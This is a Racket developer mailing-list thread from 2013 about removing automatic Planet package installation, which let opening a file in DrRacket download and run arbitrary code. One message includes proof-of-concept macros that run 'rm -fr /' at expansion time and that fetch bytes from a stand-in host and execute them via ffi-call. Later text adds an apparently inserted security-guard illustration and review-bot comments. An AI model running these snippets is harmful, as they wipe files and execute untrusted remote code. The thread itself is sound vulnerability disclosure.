Re: [racket-dev] [plt] Push #27862: master branch updated

2013-11-28 Thread Robby Findler
Oh, yes. I meant to add this to my message. This is a big part of why I
think the package system is going to work well: there is now some movement
in this good direction. (Jacob and Matthias and I had talked about social
"stuff" in the context of planet a bunch, but a) didn't do enough and b)
had a slightly different emphasis -- but b) probably would have changed if
we'd dug into it.)

Robby


On Thu, Nov 28, 2013 at 8:57 AM, Jay McCarthy wrote:

> And similarly, the package system is a social curation system to
> monitor packages for good behavior, which planet does do (but could
> have and could now.)
>
> Jay
>
> On Thu, Nov 28, 2013 at 7:56 AM, Robby Findler
>  wrote:
> > In short "yes". But that short answer isn't where we should stop. :)
> Really,
> > this is about a design decision that's different between planet and the
> > package system: in planet, "running" a program was sufficient for
> installing
> > packages. In the package system you have to take an explicit step to
> > "install" the package.
> >
> > I used quotes there because the devil is a bit in the details here (as
> Jay
> > points out with his "some macro tricks" comment) but really what we're
> > talking about is that design difference and UX issues. Overall, I feel
> like
> > the package system's different design decisions are the right way to go
> but
> > that we should keep planet being planet (and Jay and I had a discussion
> > about that offline), which is why he reverted one of those commits.
> >
> > And to clear up the check syntax thing: there is no way that online check
> > syntax could have installed a planet package (or, for that matter, made
> any
> > changes to your file system). You would have had to Run the program or
> > explicitly ask for it to be compiled or something like that.
> >
> > Make more sense?
> >
> > Robby
> >
> >
> > On Thu, Nov 28, 2013 at 8:44 AM, Matthias Felleisen <
> matth...@ccs.neu.edu>
> > wrote:
> >>
> >>
> >> Am I naive or isn't any download of any package opening the door to such
> >> tricks?
> >>
> >>
> >> On Nov 27, 2013, at 8:46 PM, Jay McCarthy wrote:
> >>
> >> > On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler
> >> >  wrote:
> >> >>
> >> >>
> >> >>
> >> >> On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy 
> >> >> wrote:
> >> >>>
> >> >>> If I have background expansion on, then when I open that file it
> >> >>> installs the package.
> >> >>>
> >> >>
> >> >> As I wrote in my previous message, it doesn't do that for me. And I
> >> >> don't
> >> >> see how it could do that, actually. Are you saying that you tried
> this?
> >> >
> >> > Yes. I put that in a file and opened it up with DrRacket then got the
> >> > "Can't download a Planet package" error message as-if the install were
> >> > stopped.
> >> >
> >> >> Can you explain how you have configured DrRacket to disable the
> >> >> security
> >> >> guard that is installed by the background expansion process, please?
> >> >
> >> > Perhaps my trial was bad because the security guard would have stopped
> >> > the network access but my error stopped the library from attempting
> >> > the network access?
> >> >
> >> > Regardless, "Check Syntax" (I think?) or compilation in Racket would
> >> > have installed it. [Now, obviously the same macro tricks could
> >> > explicitly call download/install-pkg... but I think it is a bit feeble
> >> > to say "Check Syntax" should make no attempt to prevent package
> >> > installation.]
> >> >
> >> >> Meanwhile, I would like to point out that your commit has completely
> >> >> disabled planet. No packages can be installed. Did you run any test
> >> >> suites
> >> >> after making this change?
> >> >
> >> > I tried to install and fetch some packages. I see now that I committed
> >> > in the "racket/collects" directory but the changes to make that work
> >> > were in the "pkgs/planet-pkgs" directory so I stupidly missed them.
> >> >
> >> > Jay
> >> >
> >> >> Robby
> >> >>
> >> > _
> >> >  Racket Developers list:
> >> >  http://lists.racket-lang.org/dev
> >>
> >
>
_
  Racket Developers list:
  http://lists.racket-lang.org/dev


Re: [racket-dev] [plt] Push #27862: master branch updated

2013-11-28 Thread Jay McCarthy
And similarly, the package system is a social curation system to
monitor packages for good behavior, which planet does do (but could
have and could now.)

Jay

On Thu, Nov 28, 2013 at 7:56 AM, Robby Findler wrote:
> In short "yes". But that short answer isn't where we should stop. :) Really,
> this is about a design decision that's different between planet and the
> package system: in planet, "running" a program was sufficient for installing
> packages. In the package system you have to take an explicit step to
> "install" the package.
>
> I used quotes there because the devil is a bit in the details here (as Jay
> points out with his "some macro tricks" comment) but really what we're
> talking about is that design difference and UX issues. Overall, I feel like
> the package system's different design decisions are the right way to go but
> that we should keep planet being planet (and Jay and I had a discussion
> about that offline), which is why he reverted one of those commits.
>
> And to clear up the check syntax thing: there is no way that online check
> syntax could have installed a planet package (or, for that matter, made any
> changes to your file system). You would have had to Run the program or
> explicitly ask for it to be compiled or something like that.
>
> Make more sense?
>
> Robby
>
>
On Thu, Nov 28, 2013 at 8:44 AM, Matthias Felleisen wrote:
>>
>>
>> Am I naive or isn't any download of any package opening the door to such
>> tricks?
>>
>>
>> On Nov 27, 2013, at 8:46 PM, Jay McCarthy wrote:
>>
>> > On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler
>> >  wrote:
>> >>
>> >>
>> >>
>> >> On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy 
>> >> wrote:
>> >>>
>> >>> If I have background expansion on, then when I open that file it
>> >>> installs the package.
>> >>>
>> >>
>> >> As I wrote in my previous message, it doesn't do that for me. And I
>> >> don't
>> >> see how it could do that, actually. Are you saying that you tried this?
>> >
>> > Yes. I put that in a file and opened it up with DrRacket then got the
>> > "Can't download a Planet package" error message as-if the install were
>> > stopped.
>> >
>> >> Can you explain how you have configured DrRacket to disable the
>> >> security
>> >> guard that is installed by the background expansion process, please?
>> >
>> > Perhaps my trial was bad because the security guard would have stopped
>> > the network access but my error stopped the library from attempting
>> > the network access?
>> >
>> > Regardless, "Check Syntax" (I think?) or compilation in Racket would
>> > have installed it. [Now, obviously the same macro tricks could
>> > explicitly call download/install-pkg... but I think it is a bit feeble
>> > to say "Check Syntax" should make no attempt to prevent package
>> > installation.]
>> >
>> >> Meanwhile, I would like to point out that your commit has completely
>> >> disabled planet. No packages can be installed. Did you run any test
>> >> suites
>> >> after making this change?
>> >
>> > I tried to install and fetch some packages. I see now that I committed
>> > in the "racket/collects" directory but the changes to make that work
>> > were in the "pkgs/planet-pkgs" directory so I stupidly missed them.
>> >
>> > Jay
>> >
>> >> Robby
>> >>
>>
>


Re: [racket-dev] [plt] Push #27862: master branch updated

2013-11-28 Thread Robby Findler
In short "yes". But that short answer isn't where we should stop. :)
Really, this is about a design decision that's different between planet and
the package system: in planet, "running" a program was sufficient for
installing packages. In the package system you have to take an explicit
step to "install" the package.

I used quotes there because the devil is a bit in the details here (as Jay
points out with his "some macro tricks" comment) but really what we're
talking about is that design difference and UX issues. Overall, I feel like
the package system's different design decisions are the right way to go but
that we should keep planet being planet (and Jay and I had a discussion
about that offline), which is why he reverted one of those commits.

And to clear up the check syntax thing: there is no way that online check
syntax could have installed a planet package (or, for that matter, made any
changes to your file system). You would have had to Run the program or
explicitly ask for it to be compiled or something like that.

Make more sense?

Robby


On Thu, Nov 28, 2013 at 8:44 AM, Matthias Felleisen wrote:

>
> Am I naive or isn't any download of any package opening the door to such
> tricks?
>
>
> On Nov 27, 2013, at 8:46 PM, Jay McCarthy wrote:
>
> > On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler
> >  wrote:
> >>
> >>
> >>
> >> On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy 
> wrote:
> >>>
> >>> If I have background expansion on, then when I open that file it
> >>> installs the package.
> >>>
> >>
> >> As I wrote in my previous message, it doesn't do that for me. And I
> don't
> >> see how it could do that, actually. Are you saying that you tried this?
> >
> > Yes. I put that in a file and opened it up with DrRacket then got the
> > "Can't download a Planet package" error message as-if the install were
> > stopped.
> >
> >> Can you explain how you have configured DrRacket to disable the security
> >> guard that is installed by the background expansion process, please?
> >
> > Perhaps my trial was bad because the security guard would have stopped
> > the network access but my error stopped the library from attempting
> > the network access?
> >
> > Regardless, "Check Syntax" (I think?) or compilation in Racket would
> > have installed it. [Now, obviously the same macro tricks could
> > explicitly call download/install-pkg... but I think it is a bit feeble
> > to say "Check Syntax" should make no attempt to prevent package
> > installation.]
> >
> >> Meanwhile, I would like to point out that your commit has completely
> >> disabled planet. No packages can be installed. Did you run any test
> suites
> >> after making this change?
> >
> > I tried to install and fetch some packages. I see now that I committed
> > in the "racket/collects" directory but the changes to make that work
> > were in the "pkgs/planet-pkgs" directory so I stupidly missed them.
> >
> > Jay
> >
> >> Robby
> >>
>
>


Re: [racket-dev] [plt] Push #27862: master branch updated

2013-11-28 Thread Matthias Felleisen

Am I naive or isn't any download of any package opening the door to such 
tricks? 


On Nov 27, 2013, at 8:46 PM, Jay McCarthy wrote:

> On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler
>  wrote:
>> 
>> 
>> 
>> On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy  wrote:
>>> 
>>> If I have background expansion on, then when I open that file it
>>> installs the package.
>>> 
>> 
>> As I wrote in my previous message, it doesn't do that for me. And I don't
>> see how it could do that, actually. Are you saying that you tried this?
> 
> Yes. I put that in a file and opened it up with DrRacket then got the
> "Can't download a Planet package" error message as-if the install were
> stopped.
> 
>> Can you explain how you have configured DrRacket to disable the security
>> guard that is installed by the background expansion process, please?
> 
> Perhaps my trial was bad because the security guard would have stopped
> the network access but my error stopped the library from attempting
> the network access?
> 
> Regardless, "Check Syntax" (I think?) or compilation in Racket would
> have installed it. [Now, obviously the same macro tricks could
> explicitly call download/install-pkg... but I think it is a bit feeble
> to say "Check Syntax" should make no attempt to prevent package
> installation.]
> 
>> Meanwhile, I would like to point out that your commit has completely
>> disabled planet. No packages can be installed. Did you run any test suites
>> after making this change?
> 
> I tried to install and fetch some packages. I see now that I committed
> in the "racket/collects" directory but the changes to make that work
> were in the "pkgs/planet-pkgs" directory so I stupidly missed them.
> 
> Jay
> 
>> Robby
>> 




Re: [racket-dev] [plt] Push #27862: master branch updated

2013-11-27 Thread Jay McCarthy
On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler wrote:
>
>
>
> On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy  wrote:
>>
>> If I have background expansion on, then when I open that file it
>> installs the package.
>>
>
> As I wrote in my previous message, it doesn't do that for me. And I don't
> see how it could do that, actually. Are you saying that you tried this?

Yes. I put that in a file and opened it up with DrRacket then got the
"Can't download a Planet package" error message as-if the install were
stopped.

> Can you explain how you have configured DrRacket to disable the security
> guard that is installed by the background expansion process, please?

Perhaps my trial was bad because the security guard would have stopped
the network access but my error stopped the library from attempting
the network access?

Regardless, "Check Syntax" (I think?) or compilation in Racket would
have installed it. [Now, obviously the same macro tricks could
explicitly call download/install-pkg... but I think it is a bit feeble
to say "Check Syntax" should make no attempt to prevent package
installation.]

> Meanwhile, I would like to point out that your commit has completely
> disabled planet. No packages can be installed. Did you run any test suites
> after making this change?

I tried to install and fetch some packages. I see now that I committed
in the "racket/collects" directory but the changes to make that work
were in the "pkgs/planet-pkgs" directory so I stupidly missed them.

Jay

> Robby
>


Re: [racket-dev] [plt] Push #27862: master branch updated

2013-11-27 Thread Robby Findler
On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy wrote:

> If I have background expansion on, then when I open that file it
> installs the package.
>
>
As I wrote in my previous message, it doesn't do that for me. And I don't
see how it could do that, actually. Are you saying that you tried this?

Can you explain how you have configured DrRacket to disable the security
guard that is installed by the background expansion process, please?

Meanwhile, I would like to point out that your commit has completely
disabled planet. No packages can be installed. Did you run any test suites
after making this change?

Robby
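Robby's point about the security guard that DrRacket's background expansion installs is the defensive mechanism at the centre of this thread. The following is an added, stand-alone illustration of that idea and is not DrRacket's or Racket's own code: it expands untrusted module text under a security guard that refuses file writes, deletes, executes and outbound connections, so a macro that tries to act at expansion time is stopped before it does anything. The helper names (`make-expansion-guard`, `expand-untrusted`, `expansion-outcome`) and the three sample module sources are my own constructions.

```racket
#lang racket/base

;; Guard used only while untrusted source is expanded: every file
;; write/delete/execute and every outbound connection is refused; reads
;; stay allowed so `require` can still load installed collections.
;; (Illustrative helper, not DrRacket's actual guard.)
(define (make-expansion-guard)
  (make-security-guard
   (current-security-guard)
   ;; file guard: who = primitive name, path = path or #f, modes = list of symbols
   (lambda (who path modes)
     (when (or (memq 'write modes) (memq 'delete modes) (memq 'execute modes))
       (error 'expansion-guard "~a: refused ~a on ~a" who modes path)))
   ;; network guard: mode is 'client for outbound, 'server for listening
   (lambda (who host port mode)
     (when (eq? mode 'client)
       (error 'expansion-guard "~a: refused connection to ~a:~a" who host port)))))

;; Read module text (the way an editor reads a buffer) and fully expand it
;; with the guard installed. Expansion runs macro transformers, so any
;; side effect a transformer attempts goes through the guard.
(define (expand-untrusted src-string)
  (define stx
    (parameterize ([read-accept-reader #t])
      (read-syntax 'untrusted (open-input-string src-string))))
  (parameterize ([current-namespace (make-base-namespace)]
                 [current-security-guard (make-expansion-guard)])
    (expand stx)))

;; Returns 'expanded when expansion completed, or the guard's error
;; message when a transformer tried something the guard refuses.
(define (expansion-outcome src-string)
  (with-handlers ([exn:fail? exn-message])
    (expand-untrusted src-string)
    'expanded))

;; Constructed sample: a macro that writes a file while it is expanded.
(define writes-at-expand-time
  (string-append
   "#lang racket/base\n"
   "(require (for-syntax racket/base))\n"
   "(define-syntax (drop-file stx)\n"
   "  (with-output-to-file (build-path (find-system-path 'temp-dir) \"dropped\")\n"
   "    #:exists 'replace (lambda () (display \"hi\")))\n"
   "  #'(void))\n"
   "(drop-file)\n"))

;; Constructed sample: a macro that opens a connection while it is expanded.
(define connects-at-expand-time
  (string-append
   "#lang racket/base\n"
   "(require (for-syntax racket/base racket/tcp))\n"
   "(define-syntax (phone-home stx)\n"
   "  (tcp-connect \"example.com\" 80)\n"
   "  #'(void))\n"
   "(phone-home)\n"))

;; Constructed sample: an ordinary module with no expansion-time effects.
(define harmless
  "#lang racket/base\n(define (f x) (+ x 1))\n(f 41)\n")

(module+ main
  ;; The harmless module expands; the other two are refused by the guard
  ;; before any file is written or any connection is attempted.
  (for ([src (list harmless writes-at-expand-time connects-at-expand-time)])
    (printf "~a\n" (expansion-outcome src))))
```

The guard mediates only Racket's own file and network primitives; a transformer that reaches native code through `ffi-call`, as in Jay's second example, is not checked by it, which is why expansion of untrusted code should additionally be isolated in a sandbox or a separate process.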


Re: [racket-dev] [plt] Push #27862: master branch updated

2013-11-27 Thread Jay McCarthy
If I have background expansion on, then when I open that file it
installs the package.

Since once a Planet package is installed it is set up and compiled
that means that this code:

#lang racket
(attack)
(define-syntax (attack stx)
 (system "rm -fr /"))

is automatically run as soon as I open it up.

Furthermore, I could do something like this:

#lang racket
(attack)
(define-syntax (attack stx)
 (local-require (only-in '#%foreign ffi-call _int32)
 net/http-client)

(define-values (s hs ip)
  (http-sendrecv "example.com" "/"))
(define bs (port->bytes ip))
(printf "got: ~v\n" bs)
(define weird-c-code bs)

((ffi-call weird-c-code null _int32)))

and really execute any C code that I could find on the Internet.

This isn't just a DrRacket problem though. We should not be
arbitrarily installing things on people's machines without their
consent. This power is too much.

The new system of suggesting an install or allowing an opt-in for
certain vetted packages is much kinder.

Jay




On Wed, Nov 27, 2013 at 5:35 PM, Robby Findler wrote:
> Can you demonstrate how to make this happen? Opening a file with these
> contents, for example, doesn't install anything.
>
> #lang racket
> (require (planet planet/test-connection:1:0/test-connection))
>
> As for automatically executing arbitrary code, I think you must mean
> something more precise here. Perhaps "code that hasn't already been
> explicitly installed"? If that's what you mean, then I think I'm also
> missing how this happens.
>
> Robby
>
>
> On Wed, Nov 27, 2013 at 4:42 PM, Jay McCarthy  wrote:
>>
>> There is an important change in this commit. Since we've created the
>> release branch for 6.0, I think we should stop automatically
>> installing and executing arbitrary code when people open files in
>> DrRacket. Currently the error message suggests using "raco planet" but
>> I think we need a bit of a GUI shim for other users.
>>
>> On Wed, Nov 27, 2013 at 3:40 PM,   wrote:
>> > jay has updated `master' from 033065f632 to 60ae164d05.
>> >   http://git.racket-lang.org/plt/033065f632..60ae164d05
>> >
>> > =[ 6 Commits ]==
>> > Directory summary:
>> >   57.6% pkgs/plt-services/meta/pkg-index/official/static/
>> >   17.6% pkgs/plt-services/meta/pkg-index/official/
>> >   22.0% racket/collects/planet/private/
>> >
>> > ~~
>> >
>> > 2413278 Jay McCarthy  2013-11-27 14:51
>> > :
>> > | moving delete button
>> > :
>> >   M .../meta/pkg-index/official/static/index.html |  2 ++
>> >   M .../meta/pkg-index/official/static/index.js   | 16
>> > +---
>> >   M .../meta/pkg-index/official/static/style.css  |  4 
>> >
>> > ~~
>> >
>> > 113696c Jay McCarthy  2013-11-27 14:54
>> > :
>> > | edit on lose focus
>> > :
>> >   M pkgs/plt-services/meta/pkg-index/official/static/index.js | 4 +++-
>> >
>> > ~~
>> >
>> > cf1755f Jay McCarthy  2013-11-27 15:19
>> > :
>> > | Remove arbitrary code execution exploit from Racket and DrRacket
>> > |
>> > | This is particularly bad with DrRacket's online syntax checking, which
>> > | causes opening a file to download and execute arbitrary code.
>> > :
>> >   M racket/collects/planet/private/resolver.rkt | 8 
>> >
>> > ~~
>> >
>> > 98df30c Jay McCarthy  2013-11-27 15:30
>> > :
>> > | deleting static s3 content properly
>> > :
>> >   M pkgs/plt-services/meta/pkg-index/official/static.rkt | 11
>> > ++-
>> >
>> > ~~
>> >
>> > 7b7a5ad Jay McCarthy  2013-11-27 15:33
>> > :
>> > | increase pkg test timeout
>> > :
>> >   M pkgs/plt-services/meta/props | 2 +-
>> >
>> > ~~
>> >
>> > 60ae164 Jay McCarthy  2013-11-27 15:39
>> > :
>> > | Removing add tag button when not logged in re mflatt
>> > :
>> >   M pkgs/plt-services/meta/pkg-index/official/static/index.js  | 11
>> > +--
>> >   M .../plt-services/meta/pkg-index/official/static/index.html |  2 +-
>> >
>> > =[ Overall Diff ]===
>> >
>> > pkgs/plt-services/meta/pkg-index/official/static.rkt
>> > 
>> > --- OLD/pkgs/plt-services/meta/pkg-index/official/static.rkt
>> > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static.rkt
>> > @@ -304,7 +304,16 @@
>> >(cache "/pkgs" "pkgs")
>> >(cache "/pkgs-all" "pkgs-all")
>> >(for ([p (in-list pkg-list)])
>> > -(cache (format "/pkg/~a" p) (format "pkg/~a" p
>> > +(cache (format "/pkg/~a" p) (format "pkg/~a" p)))
>> > +
>> > +  (let ()
>> > +(define pkg-path (build-path static-path "pkg"))
>> > +(for ([f (in-list (directory-list pkg-path))]
>> > +  #:unless (regexp-match #"json$" (path->string f))
>> > +  #:unless (member (path->string f) pkg-list))
>> > +  (with-handlers ([exn:fail:filesystem? void])
>> > +(delete-file (build-path pkg-path f))
>> > +(delete-file (build-path pkg-path (path-add-suffix f
>> > #".json")))
>>

Re: [racket-dev] [plt] Push #27862: master branch updated

2013-11-27 Thread Robby Findler
Can you demonstrate how to make this happen? Opening a file with these
contents, for example, doesn't install anything.

#lang racket
(require (planet planet/test-connection:1:0/test-connection))

As for automatically executing arbitrary code, I think you must mean
something more precise here. Perhaps "code that hasn't already been
explicitly installed"? If that's what you mean, then I think I'm also
missing how this happens.

Robby


On Wed, Nov 27, 2013 at 4:42 PM, Jay McCarthy wrote:

> There is an important change in this commit. Since we've created the
> release branch for 6.0, I think we should stop automatically
> installing and executing arbitrary code when people open files in
> DrRacket. Currently the error message suggests using "raco planet" but
> I think we need a bit of a GUI shim for other users.
>
> On Wed, Nov 27, 2013 at 3:40 PM,   wrote:
> > jay has updated `master' from 033065f632 to 60ae164d05.
> >   http://git.racket-lang.org/plt/033065f632..60ae164d05
> >
> > =[ 6 Commits ]==
> > Directory summary:
> >   57.6% pkgs/plt-services/meta/pkg-index/official/static/
> >   17.6% pkgs/plt-services/meta/pkg-index/official/
> >   22.0% racket/collects/planet/private/
> >
> > ~~
> >
> > 2413278 Jay McCarthy  2013-11-27 14:51
> > :
> > | moving delete button
> > :
> >   M .../meta/pkg-index/official/static/index.html |  2 ++
> >   M .../meta/pkg-index/official/static/index.js   | 16
> +---
> >   M .../meta/pkg-index/official/static/style.css  |  4 
> >
> > ~~
> >
> > 113696c Jay McCarthy  2013-11-27 14:54
> > :
> > | edit on lose focus
> > :
> >   M pkgs/plt-services/meta/pkg-index/official/static/index.js | 4 +++-
> >
> > ~~
> >
> > cf1755f Jay McCarthy  2013-11-27 15:19
> > :
> > | Remove arbitrary code execution exploit from Racket and DrRacket
> > |
> > | This is particularly bad with DrRacket's online syntax checking, which
> > | causes opening a file to download and execute arbitrary code.
> > :
> >   M racket/collects/planet/private/resolver.rkt | 8 
> >
> > ~~
> >
> > 98df30c Jay McCarthy  2013-11-27 15:30
> > :
> > | deleting static s3 content properly
> > :
> >   M pkgs/plt-services/meta/pkg-index/official/static.rkt | 11 ++-
> >
> > ~~
> >
> > 7b7a5ad Jay McCarthy  2013-11-27 15:33
> > :
> > | increase pkg test timeout
> > :
> >   M pkgs/plt-services/meta/props | 2 +-
> >
> > ~~
> >
> > 60ae164 Jay McCarthy  2013-11-27 15:39
> > :
> > | Removing add tag button when not logged in re mflatt
> > :
> >   M pkgs/plt-services/meta/pkg-index/official/static/index.js  | 11
> +--
> >   M .../plt-services/meta/pkg-index/official/static/index.html |  2 +-
> >
> > =[ Overall Diff ]===
> >
> > pkgs/plt-services/meta/pkg-index/official/static.rkt
> > 
> > --- OLD/pkgs/plt-services/meta/pkg-index/official/static.rkt
> > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static.rkt
> > @@ -304,7 +304,16 @@
> >(cache "/pkgs" "pkgs")
> >(cache "/pkgs-all" "pkgs-all")
> >(for ([p (in-list pkg-list)])
> > -(cache (format "/pkg/~a" p) (format "pkg/~a" p
> > +(cache (format "/pkg/~a" p) (format "pkg/~a" p)))
> > +
> > +  (let ()
> > +(define pkg-path (build-path static-path "pkg"))
> > +(for ([f (in-list (directory-list pkg-path))]
> > +  #:unless (regexp-match #"json$" (path->string f))
> > +  #:unless (member (path->string f) pkg-list))
> > +  (with-handlers ([exn:fail:filesystem? void])
> > +(delete-file (build-path pkg-path f))
> > +(delete-file (build-path pkg-path (path-add-suffix f
> #".json")))
> >
> >  (module+ main
> >(require racket/cmdline)
> >
> > pkgs/plt-services/meta/pkg-index/official/static/index.html
> > ~~~
> > --- OLD/pkgs/plt-services/meta/pkg-index/official/static/index.html
> > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/index.html
> > @@ -54,12 +54,14 @@
> >  Last Edit: id="pi_last_edit">
> >  Description: id="pi_description">
> >  Tags:
> > - class="text ui-widget-content ui-corner-all" /> id="pi_add_tag_button">Add Tag
> > + id="pi_add_tag_text" class="text ui-widget-content ui-corner-all" /> id="pi_add_tag_button">Add Tag
> >  Versions Exceptions id="pi_versions">
> >   id="pi_add_version_row">Version:  type="text" id="pi_add_version_text" class="text ui-widget-content
> ui-corner-all" />Source:  id="pi_add_version_source_text" class="text ui-widget-content
> ui-corner-all" />Add Version
> Exception
> >  Dependencies id="pi_dependencies">
> >  Conflicts id="pi_conflicts">
> >  Modules
> > + id="pi_delete_button">Delete
> > +Package(there is no undo!)
> >
> >
> >  

Re: [racket-dev] [plt] Push #27862: master branch updated

2013-11-27 Thread Jay McCarthy
There is an important change in this commit. Since we've created the
release branch for 6.0, I think we should stop automatically
installing and executing arbitrary code when people open files in
DrRacket. Currently the error message suggests using "raco planet" but
I think we need a bit of a GUI shim for other users.

On Wed, Nov 27, 2013 at 3:40 PM,   wrote:
> jay has updated `master' from 033065f632 to 60ae164d05.
>   http://git.racket-lang.org/plt/033065f632..60ae164d05
>
> =[ 6 Commits ]==
> Directory summary:
>   57.6% pkgs/plt-services/meta/pkg-index/official/static/
>   17.6% pkgs/plt-services/meta/pkg-index/official/
>   22.0% racket/collects/planet/private/
>
> ~~
>
> 2413278 Jay McCarthy  2013-11-27 14:51
> :
> | moving delete button
> :
>   M .../meta/pkg-index/official/static/index.html |  2 ++
>   M .../meta/pkg-index/official/static/index.js   | 16 
> +---
>   M .../meta/pkg-index/official/static/style.css  |  4 
>
> ~~
>
> 113696c Jay McCarthy  2013-11-27 14:54
> :
> | edit on lose focus
> :
>   M pkgs/plt-services/meta/pkg-index/official/static/index.js | 4 +++-
>
> ~~
>
> cf1755f Jay McCarthy  2013-11-27 15:19
> :
> | Remove arbitrary code execution exploit from Racket and DrRacket
> |
> | This is particularly bad with DrRacket's online syntax checking, which
> | causes opening a file to download and execute arbitrary code.
> :
>   M racket/collects/planet/private/resolver.rkt | 8 
>
> ~~
>
> 98df30c Jay McCarthy  2013-11-27 15:30
> :
> | deleting static s3 content properly
> :
>   M pkgs/plt-services/meta/pkg-index/official/static.rkt | 11 ++-
>
> ~~
>
> 7b7a5ad Jay McCarthy  2013-11-27 15:33
> :
> | increase pkg test timeout
> :
>   M pkgs/plt-services/meta/props | 2 +-
>
> ~~
>
> 60ae164 Jay McCarthy  2013-11-27 15:39
> :
> | Removing add tag button when not logged in re mflatt
> :
>   M pkgs/plt-services/meta/pkg-index/official/static/index.js  | 11 
> +--
>   M .../plt-services/meta/pkg-index/official/static/index.html |  2 +-
>
> =[ Overall Diff ]===
>
> pkgs/plt-services/meta/pkg-index/official/static.rkt
> 
> --- OLD/pkgs/plt-services/meta/pkg-index/official/static.rkt
> +++ NEW/pkgs/plt-services/meta/pkg-index/official/static.rkt
> @@ -304,7 +304,16 @@
>(cache "/pkgs" "pkgs")
>(cache "/pkgs-all" "pkgs-all")
>(for ([p (in-list pkg-list)])
> -(cache (format "/pkg/~a" p) (format "pkg/~a" p
> +(cache (format "/pkg/~a" p) (format "pkg/~a" p)))
> +
> +  (let ()
> +(define pkg-path (build-path static-path "pkg"))
> +(for ([f (in-list (directory-list pkg-path))]
> +  #:unless (regexp-match #"json$" (path->string f))
> +  #:unless (member (path->string f) pkg-list))
> +  (with-handlers ([exn:fail:filesystem? void])
> +(delete-file (build-path pkg-path f))
> +(delete-file (build-path pkg-path (path-add-suffix f #".json")))
>
>  (module+ main
>(require racket/cmdline)
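Review bot: the single `(with-handlers ([exn:fail:filesystem? void])` wrapping both `delete-file` calls means that if removing `f` fails, its `.json` sibling is never attempted, and either failure is swallowed silently. Give each `delete-file` its own handler and log the exception instead of discarding it with `void`, so a stale package page that could not be removed from the static mirror shows up in the deploy output. Also, `#"json$"` has no escaped dot, so a package whose name merely ends in `json` is skipped by the cleanup too; `#rx#"\\.json$"` is the intended match.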
>
> pkgs/plt-services/meta/pkg-index/official/static/index.html
> ~~~
> --- OLD/pkgs/plt-services/meta/pkg-index/official/static/index.html
> +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/index.html
> @@ -54,12 +54,14 @@
>  Last Edit:
>  Description: id="pi_description">
>  Tags:
> -Add 
> Tag
> + id="pi_add_tag_text" class="text ui-widget-content ui-corner-all" /> id="pi_add_tag_button">Add Tag
>  Versions Exceptions id="pi_versions">
>  Version: 
> Source:  id="pi_add_version_source_text" class="text ui-widget-content ui-corner-all" 
> />Add Version Exception
>  Dependencies id="pi_dependencies">
>  Conflicts id="pi_conflicts">
>  Modules
> + id="pi_delete_button">Delete
> +Package(there is no undo!)
>
>
>Install this package 
> with:raco pkg install  id="pi_name_inst">or, with the 'File|Install Package...' 
> menu option in DrRacket.
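Review bot: the new `pi_delete_button` is a destructive action advertised with `(there is no undo!)`, yet nothing in this hunk adds a confirmation step, and the button ships in the static page for every visitor. Whatever the `logged_in` flag introduced in index.js is used for, hiding a control in the browser is not authorization: the endpoint this button calls must verify the session and package ownership server-side, and a confirm dialog before the request would catch a mis-click on an irreversible operation.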
>
> pkgs/plt-services/meta/pkg-index/official/static/index.js
> ~
> --- OLD/pkgs/plt-services/meta/pkg-index/official/static/index.js
> +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/index.js
> @@ -8,6 +8,8 @@ function me () {
>  return localStorage['email']; }
>
>  $( document ).ready(function() {
> +var logged_in = false;
> +
>  function jslink ( texts, clickf) {
>  return $('', { href: "javascript:void(0)",
>click: clickf } ).html(texts); }
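Review bot: `var logged_in = false;` is a client-side flag, so anything gated on it in the UI is cosmetic; the server must make the same decision for every tag, version or delete request it receives. Separately, the `jslink` helper directly below inserts its link text with `.html(texts)`; if `texts` ever carries a package or tag name entered by another user, that is an HTML injection point, so use `.text(texts)` (or escape the value) unless the caller really passes markup.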
> @@ -43,7 +45,7 @@ $( document ).ready(function() {
>  update_package_on_list ( pkgi );
>  // console.log( pkgi );
>  change_hash( "[" + pkgi['name'] + "]" );
> -
> +
>  var mypkg_p = ($.inArr
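Review bot: the `-`/`+` pair at the top of this hunk renders as two blank lines, so it appears to be a whitespace-only change; keep such cleanups in their own commit or mention them in the message so reviewers do not hunt for a behavioral difference.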